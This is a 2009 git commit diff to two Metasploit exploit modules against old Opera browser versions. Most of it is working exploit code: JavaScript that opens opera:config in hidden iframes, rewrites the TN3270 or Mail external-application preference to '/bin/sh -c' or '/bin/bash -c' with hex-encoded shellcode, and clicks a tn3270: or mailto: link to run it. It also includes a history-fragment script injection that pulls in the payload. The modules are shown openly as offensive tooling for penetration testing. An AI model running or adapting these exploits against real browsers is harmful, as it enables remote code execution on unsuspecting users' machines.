revert overzealous commit

git-svn-id: file:///home/svn/framework3/trunk@6961 4d416f70-5f16-0410-b530-b9f4589650da
2009-08-18 04:53:35 +00:00
parent 08d50e0a5b
commit bd2da7c12a
6 changed files with 73 additions and 127 deletions
@@ -55,12 +55,12 @@ class Metasploit3 < Msf::Exploit::Remote
 				},
 			'Targets'        =>
 				[
-					[ 'Opera < 9.10 Windows', 
-						{
-							'Platform' => 'win',
-							'Arch' => ARCH_X86,
-						}
-					],
+					#[ 'Opera < 9.10 Windows', 
+					#	{
+					#		'Platform' => 'win',
+					#		'Arch' => ARCH_X86,
+					#	}
+					#],
 					[ 'Opera < 9.10 Unix Cmd', 
 						{
 							'Platform' => 'unix',
@@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	def on_request_uri(cli, request)

 		case request.uri
-		when /payload/
+		when /payload$/
 			print_status("Generating payload for #{target} #{target.platform}")
 			# Re-generate the payload
 			if ((p = regenerate_payload(cli)) == nil)
@@ -86,10 +86,12 @@ class Metasploit3 < Msf::Exploit::Remote
 				send_not_found(cli)
 				return
 			end
-			content = Msf::Util::EXE.to_win32pe_vbs(p.encoded)
+			# NOTE: Change this to the new API when commiting to trunk
+			#content = Msf::Util::EXE.to_win32pe(p.encoded)
+			#content = Rex::Text.to_win32pe(p.encoded)
+			content = "foo"
 			print_status("Generated #{content.length} bytes")
-			#headers = { 'Content-Type' => 'application/octet-stream' }
-			headers = { 'Content-Type' => 'text/html' }
+			headers = { 'Content-Type' => 'application/octet-stream' }
 		when get_resource
 			print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
 			content =  "<body><script>"
@@ -111,7 +113,6 @@ class Metasploit3 < Msf::Exploit::Remote
 		p = regenerate_payload(cli).encoded
 		#print_status(p)
 		shellcode = Rex::Text.to_hex(p, "%")
-		shellcode = Rex::Text.to_hex("foo", "%")
 		js = <<ENDJS
 blank_iframe = document.createElement('iframe');
 blank_iframe.src = 'about:blank';
@@ -120,35 +121,25 @@ blank_iframe.setAttribute('style', 'display:none');
 document.body.appendChild(blank_iframe);
 blank_iframe_window.eval(
 	"config_iframe = document.createElement('iframe');" +
-	"config_iframe.setAttribute('id', 'config_window');" +
-	"config_iframe.src = 'opera:config';" +
-	"document.body.appendChild(config_iframe);" +
-	"exe_iframe = document.createElement('img');" +
-	"exe_iframe.src = '#{get_resource}?payload.jpg';" +
-	"exe_iframe.onload = function () {" +
-	"	cache_iframe = document.createElement('iframe');" +
-	"	cache_iframe.src = 'opera:cache';" +
-	"	cache_iframe.onload = function ()" +
-	"	{" +
-	"		config_window.eval" +
-	"		(\\"" +
-	"		old_handler = opera.getPreference('Network','TN3270 App');" +
-	"		shellcode = '#{shellcode}';" +
-	"		opera.setPreference('Network','TN3270 App','/bin/sh -c ' + unescape(shellcode));" +
-	"		app_link = document.createElement('a');" +
-	"		app_link.setAttribute('href', 'tn3270://#{Rex::Text.rand_text_alpha(rand(5)+5)}');" +
-	//"		app_link.click();" +
-	"		setTimeout(function () {opera.setPreference('Network','TN3270 App',old_handler)},1000);" +
-	"		\\");" +
-	"	};" +
-	"	document.body.appendChild(cache_iframe);" +
-	"};" +
-	"exe_iframe.onerror = function (e) {" +
-	"	for (var i in e) {" +
-	"		alert(i);" +
-	"	}" +
-	"};" +
-	"document.body.appendChild(exe_iframe);" +
+    "config_iframe.setAttribute('id', 'config_iframe_window');" +
+    "config_iframe.src = 'opera:config';" +
+    "document.body.appendChild(config_iframe);" +
+    "cache_iframe = document.createElement('iframe');" +
+    "cache_iframe.src = 'opera:cache';" +
+    "cache_iframe.onload = function ()" +
+    "{" +
+    "	config_iframe_window.eval" +
+    "	(\\"" +
+	"	old_handler = opera.getPreference('Network','TN3270 App');" +
+	"	shellcode = '#{shellcode}';" +
+    "	opera.setPreference('Network','TN3270 App','/bin/sh -c ' + unescape(shellcode));" +
+    "	app_link = document.createElement('a');" +
+    "	app_link.setAttribute('href', 'tn3270://#{Rex::Text.rand_text_alpha(rand(5)+5)}');" +
+    "	app_link.click();" +
+    "	setTimeout(function () {opera.setPreference('Network','TN3270 App',old_handler)},1000);" +
+    "	\\");" +
+    "};" +
+    "document.body.appendChild(cache_iframe);" +
 "");
 ENDJS

@@ -70,12 +70,12 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Targets'        =>
 				[
 					#[ 'Automatic', {  } ],
-					[ 'Opera < 9.61 Windows', 
-						{
-							'Platform' => 'win',
-							'Arch' => ARCH_X86,
-						}
-					],
+					#[ 'Opera < 9.61 Windows', 
+					#	{
+					#		'Platform' => 'win',
+					#		'Arch' => ARCH_X86,
+					#	}
+					#],
 					[ 'Opera < 9.61 Unix Cmd', 
 						{
 							'Platform' => 'unix',
@@ -104,21 +104,37 @@ class Metasploit3 < Msf::Exploit::Remote
 			^

 		case request.uri
-		when /#{get_resource}\.exe/
-			p = regenerate_payload(cli)
-			if (p.nil?)
-				send_not_found(cli)
-				return
-			end
-			content = Msf::Util.to_win32pe(p.encoded)
-			headers['Content-Type'] = 'application/octet-stream'
 		when /[?]jspayload/
 			p = regenerate_payload(cli)
 			if (p.nil?)
 				send_not_found(cli)
 				return
 			end
-			content = generate_cmd(target, p)
+			# We're going to run this through unescape(), so make sure
+			# everything is encoded
+			penc = Rex::Text.to_hex(p.encoded, "%")
+			content = 
+				%Q{
+					var s = document.createElement("iframe");
+
+					s.src="opera:config";
+					s.id="config_window";
+					document.body.appendChild(s);
+					config_window.eval(
+						"var cmd = unescape('/bin/bash -c %22#{penc}%22 ');" +
+						"old_app = opera.getPreference('Mail','External Application');" +
+						"old_handler = opera.getPreference('Mail','Handler');" +
+						"opera.setPreference('Mail','External Application',cmd);" +
+						"opera.setPreference('Mail','Handler','2');" +
+						"app_link = document.createElement('a');" +
+						"app_link.setAttribute('href', 'mailto:a@b.com');" +
+						"app_link.click();" +
+						"setTimeout(function () {opera.setPreference('Mail','External Application',old_app)},0);" +
+						"setTimeout(function () {opera.setPreference('Mail','Handler',old_handler)},0);" +
+					"");
+					setTimeout(function () {window.location='about:blank'},1);
+				}
+
 		when /[?]history/
 			js = %Q^
 				window.onload = function() { 
@@ -136,14 +152,12 @@ class Metasploit3 < Msf::Exploit::Remote
 			print_status("Sending #{self.name} to #{cli.peerhost} for request #{request.uri}")

 			js = %Q^
-				if (window.opera) {
-					var wnd = window;
-					while (wnd.parent != wnd) {
-						wnd = wnd.parent;
-					}
-					url = location.href;
-					wnd.location = url + "?history#<script src='" + url +"?" + "jspayload=1'/><!--"; 
+				var wnd = window;
+				while (wnd.parent != wnd) {
+					wnd = wnd.parent;
 				}
+				url = location.href;
+				wnd.location = url + "?history#<script src='" + url +"?" + "jspayload=1'/><!--"; 
 				^
 			content = %Q^
 				#{html_hdr}
@@ -157,69 +171,11 @@ class Metasploit3 < Msf::Exploit::Remote
 			send_not_found(cli)
 			return
 		end
+		content.gsub!(/^\t{4}/, '')
+		content.gsub!(/\t/, ' ')

 		send_response_html(cli, content, headers)
 		handler(cli)
 	end

-	def generate_cmd(target, payload)
-		if (target.name =~ /Windows/) 
-			config_window_js = %Q{
-				var cmd = unescape('cmd.exe /c calc.exe');
-				old_app = opera.getPreference('Mail','External Application');
-				old_handler = opera.getPreference('Mail','Handler');
-				opera.setPreference('Mail','External Application',cmd);
-				opera.setPreference('Mail','Handler','2');
-				app_link = document.createElement('a');
-				app_link.setAttribute('href', 'mailto:a@b.com');
-				app_link.click();
-				setTimeout(function () {opera.setPreference('Mail','External Application',old_app)},0);
-				setTimeout(function () {opera.setPreference('Mail','Handler',old_handler)},0);
-			}
-			Rex::Text.compress(config_window_js)
-			toplevel_js = %Q{
-				var config_iframe = document.createElement("iframe");
-				config_iframe.src="opera:config";
-				config_iframe.id="config_window";
-				document.body.appendChild(config_iframe);
-
-				chache_iframe = document.createElement("iframe");
-				exe_iframe = document.createElement("script");
-				exe_iframe.src = "#{get_resource + ".exe"}";
-				exe_iframe.onload = function () { 
-					config_window.eval("#{config_window_js}");
-					setTimeout(function () {window.location='about:blank'},1);
-					document.body.appendChild(cache_iframe);
-				};
-				document.body.appendChild(exe_iframe);
-			}
-		elsif (target.name =~ /Unix/)
-			# We're going to run this through unescape(), so make sure
-			# everything is encoded, not just chars that are special to html,
-			# ala encode_uri().
-			penc = Rex::Text.to_hex(payload.encoded, "%")
-			content = %Q{
-				var s = document.createElement("iframe");
-
-				s.src="opera:config";
-				s.id="config_window";
-				document.body.appendChild(s);
-				config_window.eval(
-					"var cmd = unescape('/bin/bash -c %22#{penc}%22 ');" +
-					"old_app = opera.getPreference('Mail','External Application');" +
-					"old_handler = opera.getPreference('Mail','Handler');" +
-					"opera.setPreference('Mail','External Application',cmd);" +
-					"opera.setPreference('Mail','Handler','2');" +
-					"app_link = document.createElement('a');" +
-					"app_link.setAttribute('href', 'mailto:a@b.com');" +
-					"app_link.click();" +
-					"setTimeout(function () {opera.setPreference('Mail','External Application',old_app)},0);" +
-					"setTimeout(function () {opera.setPreference('Mail','Handler',old_handler)},0);" +
-				"");
-				setTimeout(function () {window.location='about:blank'},1);
-			}
-		return content
-		end
-	end
-
 end